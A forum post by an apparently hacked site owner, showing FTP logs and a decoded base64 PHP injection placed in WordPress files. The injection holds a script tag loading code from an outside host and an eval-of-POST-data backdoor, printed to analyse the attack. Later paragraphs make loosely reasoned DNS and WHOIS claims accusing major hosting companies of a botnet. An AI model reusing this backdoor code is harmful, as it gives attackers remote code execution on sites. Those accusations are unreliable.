Fatal Error with wp-config.php(1)

Scan you system for a trojan. Do you find one?
Did you happen to ever use SiteBuilder to edit your site?
Do you use Hostgator, Godaddy or IXwebhosting.com for your provider?

I will update more in the morning as I will be off work and can organize my notes better. To me it looks like some companies may have had their servers hacked into. I use hostgator and my site got hacked as well as many many others. Just search for hostgator hacked, godaddy hacked, sitebuilder hacked, wordpress hacked, ecommerce hacked. Set your search to look for only posts in the past week. You will be shocked.

From the looks of it some of these hosts got their database stolen and now it is being used to spread malware like crazy. The Butterfly trojan is exploding right now and Botnets are popping up like crazy.

Bottom line… Accounts were stolen and now they are being used to host malware and cache poison to further spread the Botnets.

Here is what I have time to post right now. I will post more in the morning when I have all my logs.

Hey there.

The same thing happened to my site and I am on the search for the ^$*&#) that did it, and mark my words I will find out. Here is what I have found so far.

On Oct 23 someone used ftp to edit and modify my site files.

Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php downloaded (33292 bytes, 1648.25KB/sec)

Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php uploaded (33304 bytes, 190.64KB/sec)

Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-diff.php downloaded (12373 bytes, 212.57KB/sec)

Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/fantversion.php downloaded (36 bytes, 2.81KB/sec)

Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php downloaded (2278 bytes, 43572.71KB/sec)

Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php uploaded (2290 bytes, 52.37KB/sec)

Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/readme.html downloaded (7711 bytes, 446.11KB/sec)

Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-app.php downloaded (40543 bytes, 5860.32KB/sec)

At the top of each of the replaced files was the following base_64. Here is the base_64 code decoded line by line.

aWYoIWlzc2V0KCRjcG8xKSl7ZnVuY3Rpb24gY3BvKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk

decodes to

if(!isset($cpo1)){function cpo($s){if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))

Nsl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14

decodes to

5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}if(preg_match_all(‘#<iframe ([^>]*?)src=[\'”]?(http:)?//([^

Xso/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkpwYjJKbFoyeGxlUzVqYjIwdmRHMXdMM1JsWVcxamFHRnNiR1Z1WjJVdWNHUm1MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gY3BvMigkYSwkYiwkYywkZCl7Z2xvYmFsICRjcG8xOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRjcG8xKSljYWxsX3VzZXJfZnVuYygkY3BvMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdjcG8nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk

decodes to

]*?)>#is’,$s,$a))foreach($a[0] as $v)if(preg_match(‘# width\s*=\s*[\'”]?0*[01][\'”> ]|display\s*:\s*none#i’,$v)&&!strstr($v,’?’.’>’))$s=preg_replace(‘#’.preg_quote($v,’#’).’.*?</iframe>#is’,”,$s);$s=str_replace($a=base64_decode(‘PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+’),”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,$a.’\1′,$s);elseif(strpos($s,’,a’))$s.=$a;return $s;}function cpo2($a,$b,$c,$d){global $cpo1;$s=array();if(function_exists($cpo1))call_user_func($cpo1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’cpo’)return;elseif($a==’ob_gzhandler’)break;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i

“DO NOT GO TO THIS SITE IF YOU DO NOT KNOW WHAT YOU ARE DOING”
This string from above is the winner, It decodes to “<script src=http: / / biobegley. Com/ tmp/ teamchallenge. Pdf. Php”. The file on this site is changing rapidly. It looks like the hacked site redirects to here, then this site gets the host name from the hacked site and passes back the malware to be installed. I have contacted ecommerce.com and they are looking into this site.

I am in the process of tracking down these sites as well to find the source of this but it will take me a bit as I work a lot.

($a=base64_decode(‘PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+’)

PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnY3BvJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGNwb2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2NwbzInKSkhPSdjcG8yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs

decodes to

=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘cpo’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$cpol=(($a=@set_error_handler(‘cpo2′))!=’cpo2’)?$a:0;eval(base64_decode($_POST[‘e’]));

The source of the initial ftp upload resolves to ecommerce.com. Ecommerce.com uses SiteBuilder from Ixwebhosting.com. It looks like many companies use Parallel.com’s SiteBuilder for webdesign.

Parallel.com = 68.178.232.100…. 68.178.232.100 = Godaddy.com

Right now a Whois for godaddy.com shows their nameservers are these.
NameServer: CNS1.SECURESERVER.NET
NameServer: CNS2.SECURESERVER.NET
NameServer: CNS3.SECURESERVER.NET
look a little deeper into these name servers and we get this,
CNS1.SECURESERVER.NET.LTCHOMETOWN.COM
This DNS server is

CNS1.SECURESERVER.NET.LTCHOMETOWN.COM whois resolves to this IP 216.21.231.87 which belongs to register.com. The hostname resolves to 208.109.14.24 and that belongs to GoDaddy.com as well.

Secureserver.nets Whois looks like this for the nameservers.
SECURESERVER.NET.TRAVELWITHINCOME.COM
SECURESERVER.NET.STRICTLYMODIFIEDCUSTOMS.COM
SECURESERVER.NET.ANTIGENICA.COM resolves to 216.239.32.21
SECURESERVER.NET.ALTAOWBA.COM
SECURESERVER.NET

216.239.32.21 is now being flagged.

The sites pointing to this IP that are also flagged for malware are below. source:http://www.mywot.com/en/forum/4700-fake-bank-and-other-scams?comment=22019

usedvpp.com
motors-vehicles-purchase-transactions.com
Postbank / Fortis Bank
Barclays Bank
Finance and Investment Bank LTD aka London Bank Limited
World Youth Aids Organisation
Air Express Ltd.
Lloyds TSB
Trade Escrow LLC
Best-Autos Spedition Ltd
vpp-safepay.com
World conference on global peace / human trafficking & human right
Trident Express
cartrading2.net
Fast-Kargo (PVT) Ltd
STS Spedition
Dependable Auto Shippers
International Courier Express
Bank for International Settlements
Standard Chartered Bank
Island Trust Bank
Central Bank of Nigeria
DCC Diplomatic Services

So you see this is a very very elaborate Botnet going on. I mean they have DNS poisoning